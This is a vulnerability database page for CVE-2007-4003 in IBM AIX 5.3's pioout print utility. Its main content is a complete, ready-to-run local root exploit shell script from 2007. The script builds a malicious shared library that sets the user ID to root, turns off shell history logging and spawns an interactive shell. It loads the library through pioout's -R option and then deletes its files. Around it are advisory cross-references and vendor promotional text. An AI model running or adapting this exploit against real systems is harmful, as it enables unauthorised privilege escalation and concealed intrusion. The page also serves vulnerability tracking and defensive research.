IBM AIX 5.3 SP6 - 'pioout' Arbitrary Library Loading Privilege Escalation
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| AIX 5.3 TL 6 : printers.rte (U812659) | 13 Mar 201300:00 | – | nessus | |
| AIX 5.2 TL 10 : printers.rte (U814071) | 3 Dec 200700:00 | – | nessus | |
| CVE-2007-4003 | 26 Jul 200722:00 | – | cve | |
| CVE-2007-4003 | 26 Jul 200722:00 | – | cvelist | |
| Immunity Canvas: CVE_2007_4003 | 26 Jul 200722:30 | – | canvas | |
| EUVD-2007-3987 | 7 Oct 202500:30 | – | euvd | |
| CVE-2007-4003 | 26 Jul 200722:30 | – | nvd | |
| Command injection | 26 Jul 200722:30 | – | prion | |
| iDefense Security Advisory 07.26.07: IBM AIX pioout Arbitrary Library Loading Vulnerability | 27 Jul 200700:00 | – | securityvulns | |
| IBM AIX utilities multiple security vulnerabilities | 27 Jul 200700:00 | – | securityvulns |
10
#!/bin/sh
#
# 07/2007: public release
# IBM AIX <= 5.3 sp6
#
echo "-------------------------------"
echo " AIX pioout Local Root Exploit "
echo " By qaaz"
echo "-------------------------------"
cat >piolib.c <<_EOF_
#include <stdlib.h>
#include <unistd.h>
void init() __attribute__ ((constructor));
void init()
{
seteuid(0);
setuid(0);
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", (void *) 0);
execl("/bin/sh", "sh", "-i", (void *) 0);
perror("execl");
exit(1);
}
_EOF_
gcc piolib.c -o piolib -shared -fPIC
[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib
rm -f piolib.c piolib
# milw0rm.com [2007-07-27]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Oct 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.9
EPSS0.01755